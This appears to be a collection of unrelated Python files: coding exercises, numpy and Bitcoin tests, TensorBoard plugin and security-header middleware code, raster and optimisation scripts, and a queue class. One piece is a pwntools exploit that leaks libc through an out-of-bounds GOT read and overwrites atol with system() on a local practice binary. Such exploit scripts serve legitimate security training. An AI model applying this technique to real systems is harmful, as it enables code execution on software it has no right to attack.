for import_item in import_items:
try:
yield self.resolve_import(import_item)
except ImportException as err:
logging.info('unknown module %s', err.module_name)
|
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = process('./example04')
gdb.attach(p)
def write(what, where):
p.sendlineafter('>', str(where))
p.sendlineafter('>', str(what))
def read(where):
p.sendlineafter('>', str(where))
return int(p.recvline())
binary = ELF('./example04')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write(1, 1)
atol_got = binary.symbols['got.atol']
numbers = binary.symbols['numbers']
index = str(int((atol_got - numbers) / 8))
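# The read/write primitives index into the 8-byte-wide 'numbers' array, so the
# distance from 'numbers' to atol's GOT slot, measured in 8-byte strides,
# yields an out-of-bounds index that aliases the GOT entry.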
print('index', index)
atol_leak = read(index)
print('atol_leak', hex(atol_leak))
libc_base = atol_leak - libc.symbols['atol']
system_addr = libc_base + libc.symbols['system']
print('system', hex(system_addr))
write(system_addr, index)
p.interactive()
|
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the makeAnagram function below.
def makeAnagram(a, b):
a_char_dict = defaultdict(int)
for char in a:
a_char_dict[char] += 1
counter = 0
for char in b:
if a_char_dict[char] != 0:
a_char_dict[char] -= 1
else:
counter += 1
for value in a_char_dict.values():
counter += value
return counter
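# A quick illustrative check (not part of the HackerRank harness):
#   makeAnagram('cde', 'abc') == 4, since 'd' and 'e' must be deleted from a
#   and 'a' and 'b' from b, leaving only the shared 'c'.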
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a = input()
b = input()
res = makeAnagram(a, b)
fptr.write(str(res) + '\n')
fptr.close()
|
# Copyright (c) 2022 CNES
#
# All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pickle
import numpy as np
import pytest
from ... import core
def weighted_mom1(values, weights):
"""Return the weighted moment 1 of the values."""
return np.average(values, weights=weights)
def weighted_mom2(values, weights):
"""Return the weighted moment 2 of the values."""
average = weighted_mom1(values, weights)
return np.average((values - average)**2, weights=weights)
def weighted_mom3(values, weights):
"""Return the weighted moment 3 of the values."""
average = weighted_mom1(values, weights)
mom2 = weighted_mom2(values, weights)
return np.average(((values - average) / np.sqrt(mom2))**3, weights=weights)
def weighted_mom4(values, weights):
"""Return the weighted moment 4 of the values."""
average = weighted_mom1(values, weights)
mom2 = weighted_mom2(values, weights)
return np.average(((values - average) / np.sqrt(mom2))**4 - 3,
weights=weights)
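# Illustrative sanity check (not part of the test suite): with uniform weights
# these helpers reduce to the ordinary unweighted moments, e.g.
#   weighted_mom1(np.array([1.0, 2.0, 3.0]), np.ones(3)) == 2.0
#   weighted_mom2(np.array([1.0, 2.0, 3.0]), np.ones(3)) == 2.0 / 3.0  # == np.var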
def test_empty_container():
"""Test the calculation of statistics on an empty container."""
ds = core.DescriptiveStatisticsFloat64(np.array([]))
assert ds.count() == 0
assert np.isnan(ds.max())
assert np.isnan(ds.mean())
assert np.isnan(ds.min())
assert ds.sum_of_weights() == 0
assert ds.sum() == 0
assert np.isnan(ds.variance())
assert np.isnan(ds.skewness())
assert np.isnan(ds.kurtosis())
def test_flatten():
"""Test the calculation of statistics on a vector"""
values = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values)
assert ds.count() == values.size
assert ds.max() == np.max(values)
assert ds.mean() == pytest.approx(np.mean(values))
assert ds.min() == np.min(values)
assert ds.sum_of_weights() == values.size
assert ds.sum() == pytest.approx(np.sum(values))
assert ds.variance() == pytest.approx(np.var(values))
assert ds.kurtosis() == pytest.approx(
weighted_mom4(values, np.ones(values.size)))
assert ds.skewness() == pytest.approx(
weighted_mom3(values, np.ones(values.size)))
def test_merge():
"""Test merging."""
values = np.random.random_sample(1000)
instance1 = core.DescriptiveStatisticsFloat64(values[:500])
instance2 = core.DescriptiveStatisticsFloat64(values[500:])
instance1 += instance2
del instance2
assert instance1.count() == values.size
assert instance1.max() == np.max(values)
assert instance1.mean() == pytest.approx(np.mean(values))
assert instance1.min() == np.min(values)
assert instance1.sum_of_weights() == values.size
assert instance1.sum() == pytest.approx(np.sum(values))
assert instance1.variance() == pytest.approx(np.var(values))
assert instance1.kurtosis() == pytest.approx(
weighted_mom4(values, np.ones(values.size)))
assert instance1.skewness() == pytest.approx(
weighted_mom3(values, np.ones(values.size)))
def test_pickle():
"""Test pickling."""
values = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values)
other = pickle.loads(pickle.dumps(ds))
assert other.count() == ds.count()
assert other.max() == ds.max()
assert other.mean() == ds.mean()
assert other.min() == ds.min()
assert other.sum_of_weights() == ds.sum_of_weights()
assert other.sum() == ds.sum()
assert other.variance() == ds.variance()
assert other.skewness() == ds.skewness()
assert other.kurtosis() == ds.kurtosis()
def test_weighted():
"""Test weighted statistics."""
values = np.random.random_sample(1000)
weights = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values, weights=weights)
assert ds.count() == values.size
assert ds.max() == np.max(values * weights)
assert ds.mean() == pytest.approx(weighted_mom1(values, weights))
assert ds.min() == np.min(values * weights)
assert ds.sum_of_weights() == pytest.approx(np.sum(weights))
assert ds.sum() == pytest.approx(np.sum(values * weights))
assert ds.variance() == pytest.approx(weighted_mom2(values, weights))
assert ds.kurtosis() == pytest.approx(weighted_mom4(values, weights))
assert ds.skewness() == pytest.approx(weighted_mom3(values, weights))
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, weights=weights[:100])
def test_axis():
"""Test axes along which the statistics are computed"""
values = np.random.random_sample((2, 3, 4, 5, 6, 7))
def check_axis(values, axis):
ds = core.DescriptiveStatisticsFloat64(values, axis=axis)
assert np.all(ds.count() == np.sum(values * 0 + 1, axis=axis))
assert np.all(ds.max() == np.max(values, axis=axis))
assert ds.mean() == pytest.approx(np.mean(values, axis=axis))
assert np.all(ds.min() == np.min(values, axis=axis))
assert np.all(ds.sum_of_weights() == np.sum(values * 0 + 1, axis=axis))
assert ds.sum() == pytest.approx(np.sum(values, axis=axis))
assert ds.variance() == pytest.approx(np.var(values, axis=axis))
check_axis(values, None)
check_axis(values, (1, ))
check_axis(values, (2, 3))
check_axis(values, (1, 3, 5))
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, axis=(12, )) # type: ignore
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, axis=(-1, )) # type: ignore
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Graphs plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from werkzeug import wrappers
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.plugins import base_plugin
_PLUGIN_PREFIX_ROUTE = 'graphs'
class GraphsPlugin(base_plugin.TBPlugin):
"""Graphs Plugin for TensorBoard."""
plugin_name = _PLUGIN_PREFIX_ROUTE
def get_plugin_apps(self, multiplexer, unused_logdir):
self._multiplexer = multiplexer
return {
'/graph': self.graph_route,
'/runs': self.runs_route,
'/run_metadata': self.run_metadata_route,
'/run_metadata_tags': self.run_metadata_tags_route,
}
def is_active(self):
"""The graphs plugin is active iff any run has a graph."""
return bool(self.index_impl())
def index_impl(self):
"""Returns a list of all runs that have a graph."""
return [run_name
for (run_name, run_data) in self._multiplexer.Runs().items()
if run_data.get(event_accumulator.GRAPH)]
def run_metadata_index_impl(self):
"""Returns a run-to-tag mapping for metadata."""
return {
run_name: run_data[event_accumulator.RUN_METADATA]
for (run_name, run_data) in self._multiplexer.Runs().items()
if event_accumulator.RUN_METADATA in run_data
}
def graph_impl(self, run, limit_attr_size=None, large_attrs_key=None):
"""Result of the form `(body, mime_type)`, or `None` if no graph exists."""
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return None
# This next line might raise a ValueError if the limit parameters
# are invalid (size is negative, size present but key absent, etc.).
process_graph.prepare_graph_for_ui(graph, limit_attr_size, large_attrs_key)
return (str(graph), 'text/x-protobuf') # pbtxt
def run_metadata_impl(self, run, tag):
"""Result of the form `(body, mime_type)`, or `None` if no data exists."""
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return None
return (str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def runs_route(self, request):
index = self.index_impl()
return http_util.Respond(request, index, 'application/json')
@wrappers.Request.application
def run_metadata_tags_route(self, request):
index = self.run_metadata_index_impl()
return http_util.Respond(request, index, 'application/json')
@wrappers.Request.application
def graph_route(self, request):
"""Given a single run, return the graph definition in protobuf format."""
run = request.args.get('run')
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be an integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
result = self.graph_impl(run, limit_attr_size, large_attrs_key)
except ValueError as e:
      return http_util.Respond(request, str(e), 'text/plain', code=400)
else:
if result is not None:
(body, mime_type) = result # pylint: disable=unpacking-non-sequence
return http_util.Respond(request, body, mime_type)
else:
return http_util.Respond(request, '404 Not Found', 'text/plain',
code=404)
@wrappers.Request.application
def run_metadata_route(self, request):
"""Given a tag and a run, return the session.run() metadata."""
tag = request.args.get('tag')
run = request.args.get('run')
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
result = self.run_metadata_impl(run, tag)
if result is not None:
(body, mime_type) = result # pylint: disable=unpacking-non-sequence
return http_util.Respond(request, body, mime_type)
else:
return http_util.Respond(request, '404 Not Found', 'text/plain',
code=404)
|
# pylint: skip-file
import pyomo.environ as aml
import math
import operator as op
from functools import reduce
def get_pyomo_model(*args, **kwargs):
m = aml.ConcreteModel()
m.I = range(5)
def init_x(m, i):
return [-1.717142, 1.595708, 1.827248, -0.7636429, -0.7636435][i]
m.x = aml.Var(m.I, initialize=init_x)
m.cons0 = aml.Constraint(expr=sum(m.x[i]**2 for i in m.I) == 10)
m.cons1 = aml.Constraint(expr=m.x[1]*m.x[2] - 5*m.x[3]*m.x[4] == 0)
m.cons2 = aml.Constraint(expr=m.x[0]**3 + m.x[1]**3 == -1)
m.obj = aml.Objective(expr=reduce(op.mul, [m.x[i] for i in m.I], 1.0))
return m
|
import datetime
import yaml
class FileClass:
"""
Класс для работы с файлом file_name, который передаётся в конструктр из main
- Записывает данные в файл
- Читает данные из файла
"""
def __init__(self, file_name, method=1):
self.file_name = file_name
if method == 2:
self.read_file()
def set_file(self, content):
with open(self.file_name, "w") as outfile:
yaml.safe_dump(content, outfile, allow_unicode=True)
def read_file(self):
with open(self.file_name, "r") as outfile:
self.content = yaml.safe_load(outfile)
def get_text(self):
return self.content
class UniversalClass:
@staticmethod
def get_train_time(*time_ranges):
"""
Метод для вычисления времени прибытия поезда
Необходим для проверки на то, успевает ли человек на свой поезд
"""
out_list = []
for time_range in time_ranges:
time = time_range[0]
begin_time = time_range[1]
train_begin_time = datetime.datetime.strptime(begin_time, "%d.%m.%Y %H:%M")
train_arrive_time = train_begin_time + datetime.timedelta(minutes=time)
out_list.append((train_begin_time, train_arrive_time))
return out_list
@staticmethod
def detect_station_waiting_time(station_name, all_wait_list):
"""
Определяем, есть ли станция в словаре ожидания
- Если есть такая станция, то отдаём True и время ожидания
- Если нет, то False и None
"""
for way in all_wait_list["ways"]:
if station_name == way["point"]:
return True, way["time"]
return False, None
@staticmethod
def get_ways_string(ways_list):
"""
Отдаёт единую строку путей для красивого вывода в result_outputer
"""
buf_list = []
for e in ways_list:
buf_list.extend([e["way_from"], e["way_to"]])
results = []
for item in buf_list:
if results and item == results[-1]:
results.pop()
results.append(item)
return " -> ".join(results)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Source: https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
# Python basics
print('包含中文的str')
# Python provides ord() to get a character's integer code point and chr() to convert a code point back to a character
print(ord('A'))
print(chr(66))
print(chr(25191))
# encoding
print('ABC'.encode('ascii'))
print('中文'.encode('utf-8'))
print(b'ABC'.decode('ascii'))
print(b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8'))
# list and tuple
classmates = ['Michael', 'Bob', 'Tracy']
print(classmates)
print(len(classmates)) # length
print(classmates[0])
print(classmates[-1])
classmates.append('Adam') # append
print(classmates)
classmates.insert(1, 'Jack') # insert at a given position
print(classmates)
classmates.pop(1) # remove the element at a given position
print(classmates)
classmates[1] = 'Sarah'
print('classmates =', classmates)
# a list can hold elements of different types
L = ['Apple', 123, True]
s = ['python', 'java', ['asp', 'php'], 'scheme']
L1 = []
# tuple
t = (1, 2)
print(t)
t1 = (1, ) # a tuple with a single element must include a trailing comma to avoid ambiguity
print(t1)
# a "mutable" tuple (the list it contains can still be modified)
t2 = ('a', 'b', ['A', 'B'])
# print(t2[2])
t2[2][0] = 'X'
t2[2][1] = 'Y'
print(t2)
# conditionals
age = 3
if age >= 18:
print('adult')
elif age >= 6:
print('teenager')
else:
print('kid')
# s = input('birth: ')
# birth = int(s)
# if birth < 2000:
#     print('born before 2000')
# else:
#     print('born in or after 2000')
# loops
# for
names = ['Michael', 'Bob', 'Tracy']
for name in names:
print(name)
sum = 0
for x in range(0, 101):
sum = sum + x
print(sum)
# while
sum = 0
n = 99
while n > 0:
sum = sum + n
n = n - 2
print(sum)
# break
n = 1
while n <= 100:
if n > 10:
break
print(n)
n = n + 1
print('END')
# continue
n = 0
while n < 10:
n = n + 1
    if n % 2 == 0: # if n is even, execute the continue statement
        continue # continue jumps straight to the next iteration; the print() below is skipped
print(n)
# dict
# set
# s = set([1, 2, 3])
s = set([1, 1, 2, 2, 3, 3]) # a set stores no duplicate keys
print(s)
""" A set can be viewed as a mathematical set of unordered, unique elements, so two sets support operations such as intersection and union: """
s1 = set([1, 2, 3])
s2 = set([2, 3, 4])
print(s1 & s2)
print(s1 | s2)
# Practice
L = [['Apple', 'Google', 'Microsoft'], ['Java', 'Python', 'Ruby', 'PHP'],
['Adam', 'Bart', 'Lisa']]
print(L[0][0])
print(L[1][1])
print(L[2][2])
|
"""Helper functions to be used in views.py/routes file"""
import networkx as nx
import matplotlib
matplotlib.use('Agg')
# for basic network visualizing
import matplotlib.pyplot as plt
# createdb -E UTF8 -T template0 --locale=en_US.utf8 barternet
# specifying system path for module import
import sys
sys.path.append('..')
def add_node(Z, u_id, name):
"""Adding nodes to a graph object in networkx"""
    Z.add_node(u_id, name=name)
def add_edges(Z, skill_to, skill_from):
"""Adding edges to a graph object in networkx"""
for x, name_s in skill_from:
Z.add_edges_from([(x.user_id, y.user_id, {'name': name_s})for y in skill_to if x.skill_id == y.skill_id])
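# Minimal usage sketch (illustrative; 'offers' and 'requests' are hypothetical
# iterables of (record, skill_name) pairs whose records carry user_id and
# skill_id attributes):
#   Z = nx.DiGraph()
#   add_node(Z, 1, 'alice')
#   add_node(Z, 2, 'bob')
#   add_edges(Z, skill_to=offers, skill_from=requests)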
|
# Author: Pia Feiel
# Date: 21/01/22
# Topic: assign 0 to nodata values & reclassify (8 classes)
# IMPORTS
import os, sys, cfg_sapi, cmd_sapi, saga_api
import numpy as np
#from qgis.utils import iface
from osgeo import gdal
import osgeo.gdal
import math
#import ogr
import glob
from PyQt5 import QtGui
cmd_sapi.Initialize(True)  # prints "Number of loaded libraries"
####################################---IN1---########################################
EKIN = saga_api.SG_Get_Data_Manager().Add_Grid("data/anriss2_klblock.asc")
# Metadata
Cellsize = EKIN.Get_Cellsize()
LLX = EKIN.Get_XMin()  # lower-left corner x coordinate
LLY = EKIN.Get_YMin()  # lower-left corner y coordinate
NX = EKIN.Get_NX()  # number of x pixels -> defines the size of the numpy array
NY = EKIN.Get_NY()  # number of y pixels
Nodata = EKIN.Get_NoData_Value()
print(Nodata)
print(NX)
print("Reading Raster...")  # just for nicer output :)
EKINArray = np.empty((NY,NX))  # create a numpy array with the dimensions of the raster
for gy in range(NY):  # iterate over rows (y)
    for gx in range(NX):  # iterate over columns (x)
        zDSM = EKIN.asFloat(gx, gy)  # gx, gy are the coordinates of one pixel
        EKINArray[gy,gx] = zDSM  # write the float value at these coordinates into the array
print(EKINArray)
####################################---NoData---########################################
# this loop replaces nodata values (-9999) with 0 in a new raster
OutputArray = np.empty((NY,NX))
for gy in range(NY):  # iterate over rows (y)
    for gx in range(NX):  # iterate over columns (x)
        if EKINArray[gy,gx] == -9999:
            OutputArray[gy,gx] = 0
        else:
            OutputArray[gy,gx] = EKINArray[gy,gx]
print(OutputArray)
####################################---classify---########################################
for gy in range(NY):
    for gx in range(NX):
        if OutputArray[gy,gx] < 1500:
            OutputArray[gy,gx] = 1
        elif 1500 <= OutputArray[gy,gx] < 3000:
            OutputArray[gy,gx] = 2
        elif 3000 <= OutputArray[gy,gx] < 5000:
            OutputArray[gy,gx] = 3
        elif 5000 <= OutputArray[gy,gx] < 10000:
            OutputArray[gy,gx] = 4
        elif 10000 <= OutputArray[gy,gx] < 30000:
            OutputArray[gy,gx] = 5
        elif 30000 <= OutputArray[gy,gx] < 50000:
            OutputArray[gy,gx] = 6
        elif 50000 <= OutputArray[gy,gx] < 75000:
            OutputArray[gy,gx] = 7
        else:
            OutputArray[gy,gx] = 8
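# Note: an equivalent vectorized form of the reclassification above (a sketch,
# assuming the same class boundaries) would be:
#   bins = [1500, 3000, 5000, 10000, 30000, 50000, 75000]
#   OutputArray = np.digitize(OutputArray, bins) + 1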
####################################---OUT---########################################
Out = saga_api.SG_Create_Grid(saga_api.SG_DATATYPE_Float,NX,NY,Cellsize,LLX,LLY,False)
Out.Assign_NoData()
print("Writing Raster...")
for gy in range(NY):
    for gx in range(NX):
        z = OutputArray[gy,gx]  # specify the desired output array HERE!
        Out.Set_Value(gx,gy,z)
Out.Set_Name(saga_api.CSG_String("rammsenergy1_nodata"))
Out.Save("output/rammsenergy1.sgrd")  # write into the output folder
print("done")
|
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.messages import (
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
ToHex,
FromHex)
from test_framework.script import (
CScript,
hash160,
OP_EQUAL,
OP_HASH160,
OP_TRUE,
)
from test_framework.validaterawtransaction import check_validaterawtx
from test_framework.util import sync_mempools
# Copied from abc-segwit-recovery-activation
# Returns 2 transactions:
# 1) txfund: create outputs in segwit addresses
# 2) txspend: spends outputs from segwit addresses
def create_segwit_fund_and_spend_tx(node, spend, case0=False):
if not case0:
# To make sure we'll be able to recover coins sent to segwit addresses,
# we test using historical recoveries from btc.com:
# Spending from a P2SH-P2WPKH coin,
# txhash:a45698363249312f8d3d93676aa714be59b0bd758e62fa054fb1ea6218480691
redeem_script0 = bytearray.fromhex(
'0014fcf9969ce1c98a135ed293719721fb69f0b686cb')
# Spending from a P2SH-P2WSH coin,
# txhash:6b536caf727ccd02c395a1d00b752098ec96e8ec46c96bee8582be6b5060fa2f
redeem_script1 = bytearray.fromhex(
'0020fc8b08ed636cb23afcb425ff260b3abd03380a2333b54cfa5d51ac52d803baf4')
else:
redeem_script0 = bytearray.fromhex('51020000')
redeem_script1 = bytearray.fromhex('53020080')
redeem_scripts = [redeem_script0, redeem_script1]
# Fund transaction to segwit addresses
txfund = CTransaction()
txfund.vin = [CTxIn(COutPoint(int(spend['txid'], 16), spend['vout']))]
amount = (50 * COIN - 1000) // len(redeem_scripts)
for redeem_script in redeem_scripts:
txfund.vout.append(
CTxOut(amount, CScript([OP_HASH160, hash160(redeem_script), OP_EQUAL])))
txfund = FromHex(CTransaction(), node.signrawtransactionwithwallet(ToHex(txfund))["hex"])
txfund.rehash()
# Segwit spending transaction
# We'll test if a node that checks for standardness accepts this
# txn. It should fail exclusively because of the restriction in
    # the scriptSig (non-clean stack), so all other characteristics
# must pass standardness checks. For this reason, we create
# standard P2SH outputs.
txspend = CTransaction()
for i in range(len(redeem_scripts)):
txspend.vin.append(
CTxIn(COutPoint(txfund.sha256, i), CScript([redeem_scripts[i]])))
txspend.vout = [CTxOut(50 * COIN - 2000,
CScript([OP_HASH160, hash160(CScript([OP_TRUE])), OP_EQUAL]))]
txspend.rehash()
return txfund, txspend
class ValidateRawSegwitTransactionTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
["-acceptnonstdtxn=1"],
["-acceptnonstdtxn=0"]]
def run_test(self):
self.log.info("Test started");
node_accepting_nonstandard = self.nodes[0]
node_rejecting_nonstandard = self.nodes[1]
n = node_rejecting_nonstandard
n.generate(105)
out = n.listunspent()
txfund, txspend = create_segwit_fund_and_spend_tx(n, out.pop())
txfund_case0, txspend_case0 = create_segwit_fund_and_spend_tx(n, out.pop(), True)
        # Funding transactions are standards-compliant and accepted by both nodes
for tx in [txfund, txfund_case0]:
check_validaterawtx(node_rejecting_nonstandard,
tx, num_errors = 0)
check_validaterawtx(node_accepting_nonstandard,
tx, num_errors = 0)
n.sendrawtransaction(ToHex(txfund))
n.sendrawtransaction(ToHex(txfund_case0))
sync_mempools(self.nodes)
# Recovery transaction is non-standard
for tx in [txspend, txspend_case0]:
check_validaterawtx(node_rejecting_nonstandard,
tx,
is_minable = False,
has_valid_inputs = False,
num_errors = len(["input-script-failed"]))
# # Upstream has changed to a weird policy for segwit transactions,
# # they are no longer accepted to mempool, even though they are
# # valid non-standard transactions.
# check_validaterawtx(node_accepting_nonstandard,
# tx, num_errors = 0)
#
# node_accepting_nonstandard.sendrawtransaction(ToHex(txspend))
# node_accepting_nonstandard.sendrawtransaction(ToHex(txspend_case0))
check_validaterawtx(node_accepting_nonstandard,
tx,
is_minable = False,
has_valid_inputs = False,
num_errors = len(["input-script-failed"]))
if __name__ == '__main__':
ValidateRawSegwitTransactionTest().main()
|
"""
entradas
capitalparaprestamo-->c-->float
tasadeinteres-->t-->float
salidas
porcentajeanualdecobro-->i-->float
"""
#entradas
c=float(input("Ingrese el capital "))
t=float(input("Ingrese la tasa de interes "))
#caja negra
i=(t*100)/(c*4)
#salidas
print("El porcentaje anual de cobro por el prestamo de ",c, " sera de ",i, "%")
|
from typing import Any, List
from dataclasses import dataclass, field
from PyDS.Error import Empty
@dataclass
class Queue:
"""Implementation of Queue ADT
:param __capacity: The maximum number of elements a queue can hold
:type __capacity: int
:param __list: A container that holds n-elements in queue
:type __list: list[Any]
:param __front: The index pointing at front of queue
:type __front: int
:param __size: The size of the queue
:type __size: int
"""
__capacity: int = 64
__list: List[Any] = field(default_factory=lambda: [None] * Queue.__capacity)
__front: int = 0
__size: int = 0
def enqueue(self, value: Any) -> None:
"""Insertion to the tail of the queue
:param value: The value inserting to the tail
:type value: Any
"""
if self.__size == self.__capacity:
self.__resize(capacity=2 * self.__capacity)
end = (self.__front + self.__size) % self.__capacity
self.__list[end] = value
self.__size += 1
def dequeue(self) -> Any:
"""Deletion at the front of the queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
if 0 < self.__size < (self.__capacity // 4):
self.__resize(capacity=self.__capacity // 2)
value = self.__list[self.__front]
self.__list[self.__front] = None
self.__front = (self.__front + 1) % self.__capacity
self.__size -= 1
return value
def front(self) -> Any:
"""Gets value at front of queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
return self.__list[self.__front]
def is_empty(self) -> bool:
"""Checks to see if queue is empty
:return: Whether or not the queue's empty
:rtype: bool
"""
return self.__size == 0
    def __resize(self, capacity: int) -> None:
        """Resize the queue's underlying list to the given capacity"""
list_ = [None] * capacity
front = self.__front
for i in range(self.__size):
list_[i] = self.__list[front]
front = (front + 1) % self.__capacity
self.__front = 0
self.__list = list_
self.__capacity = capacity
def __len__(self) -> int:
return self.__size
def __str__(self) -> str:
if self.is_empty():
return 'Queue([])'
front = self.__front
output = 'Queue(['
for _ in range(self.__size - 1):
output += f'{self.__list[front]}, '
front = (front + 1) % self.__capacity
output += f'{self.__list[front]}])'
return output
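# A minimal usage sketch (illustrative; assumes PyDS.Error.Empty is importable
# as above):
if __name__ == '__main__':
    q = Queue()
    for n in (1, 2, 3):
        q.enqueue(n)
    assert q.front() == 1
    assert q.dequeue() == 1
    assert len(q) == 2
    print(q)  # Queue([2, 3])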
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Validates responses and their security features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from werkzeug.datastructures import Headers
from werkzeug import http
from tensorboard.util import tb_logging
# Loosely follow vocabulary from https://www.w3.org/TR/CSP/#framework-directives.
Directive = collections.namedtuple("Directive", ["name", "value"])
logger = tb_logging.get_logger()
_HTML_MIME_TYPE = "text/html"
_CSP_DEFAULT_SRC = "default-src"
# Whitelist of allowed CSP violations.
_CSP_IGNORE = {
# Allow TensorBoard to be iframed.
"frame-ancestors": ["*"],
# Polymer-based code uses unsafe-inline.
"style-src": ["'unsafe-inline'", "data:"],
# Used in canvas
"img-src": ["blob:", "data:"],
# Used by numericjs.
# TODO(stephanwlee): remove it eventually.
"script-src": ["'unsafe-eval'"],
}
def _maybe_raise_value_error(error_msg):
logger.warning("In 3.0, this warning will become an error:\n%s" % error_msg)
# TODO(3.x): raise a value error.
class SecurityValidatorMiddleware(object):
"""WSGI middleware validating security on response.
It validates:
- responses have Content-Type
- responses have X-Content-Type-Options: nosniff
- text/html responses have CSP header. It also validates whether the CSP
headers pass basic requirement. e.g., default-src should be present, cannot
use "*" directive, and others. For more complete list, please refer to
_validate_csp_policies.
Instances of this class are WSGI applications (see PEP 3333).
"""
def __init__(self, application):
"""Initializes an `SecurityValidatorMiddleware`.
Args:
application: The WSGI application to wrap (see PEP 3333).
"""
self._application = application
def __call__(self, environ, start_response):
def start_response_proxy(status, headers, exc_info=None):
self._validate_headers(headers)
return start_response(status, headers, exc_info)
return self._application(environ, start_response_proxy)
def _validate_headers(self, headers_list):
headers = Headers(headers_list)
self._validate_content_type(headers)
self._validate_x_content_type_options(headers)
self._validate_csp_headers(headers)
def _validate_content_type(self, headers):
if headers.get("Content-Type"):
return
_maybe_raise_value_error("Content-Type is required on a Response")
def _validate_x_content_type_options(self, headers):
option = headers.get("X-Content-Type-Options")
if option == "nosniff":
return
_maybe_raise_value_error(
'X-Content-Type-Options is required to be "nosniff"'
)
def _validate_csp_headers(self, headers):
mime_type, _ = http.parse_options_header(headers.get("Content-Type"))
if mime_type != _HTML_MIME_TYPE:
return
csp_texts = headers.get_all("Content-Security-Policy")
policies = []
for csp_text in csp_texts:
policies += self._parse_serialized_csp(csp_text)
self._validate_csp_policies(policies)
def _validate_csp_policies(self, policies):
has_default_src = False
violations = []
for directive in policies:
name = directive.name
for value in directive.value:
has_default_src = has_default_src or name == _CSP_DEFAULT_SRC
if value in _CSP_IGNORE.get(name, []):
# There are cases where certain directives are legitimate.
continue
# TensorBoard follows principle of least privilege. However, to make it
# easier to conform to the security policy for plugin authors,
# TensorBoard trusts request and resources originating its server. Also,
# it can selectively trust domains as long as they use https protocol.
# Lastly, it can allow 'none' directive.
# TODO(stephanwlee): allow configuration for whitelist of domains for
# stricter enforcement.
# TODO(stephanwlee): deprecate the sha-based whitelisting.
if (
value == "'self'"
or value == "'none'"
or value.startswith("https:")
or value.startswith("'sha256-")
):
continue
msg = "Illegal Content-Security-Policy for {name}: {value}".format(
name=name, value=value
)
violations.append(msg)
if not has_default_src:
violations.append(
"Requires default-src for Content-Security-Policy"
)
if violations:
_maybe_raise_value_error("\n".join(violations))
def _parse_serialized_csp(self, csp_text):
# See https://www.w3.org/TR/CSP/#parse-serialized-policy.
# Below Steps are based on the algorithm stated in above spec.
# Deviations:
# - it does not warn and ignore duplicative directive (Step 2.5)
# Step 2
csp_srcs = csp_text.split(";")
policy = []
for token in csp_srcs:
# Step 2.1
token = token.strip()
if not token:
# Step 2.2
continue
# Step 2.3
token_frag = token.split(None, 1)
name = token_frag[0]
values = token_frag[1] if len(token_frag) == 2 else ""
# Step 2.4
name = name.lower()
# Step 2.6
value = values.split()
# Step 2.7
directive = Directive(name=name, value=value)
# Step 2.8
policy.append(directive)
return policy
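# For illustration, parsing a serialized policy with the algorithm above, e.g.
#   _parse_serialized_csp("default-src 'self'; img-src data: blob:")
# yields
#   [Directive(name='default-src', value=["'self'"]),
#    Directive(name='img-src', value=['data:', 'blob:'])]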
|
#!/usr/bin/env python3
##############################################################################
# Author: Chao XU
# Date: 2019-01-27
# Affiliation: Peking University, TU Dresden
# Function: stanford parser and tagger
##############################################################################
from nltk.parse.corenlp import CoreNLPParser
from nltk.tag import StanfordPOSTagger
import os
from nltk.tree import Tree
def get_postagger_for_criterion(criterion):
#ini_path = "/stanford/postagger"
#os.environ['STANFORD_PARSER'] = ini_path
#os.environ['STANFORD_MODELS'] = ini_path
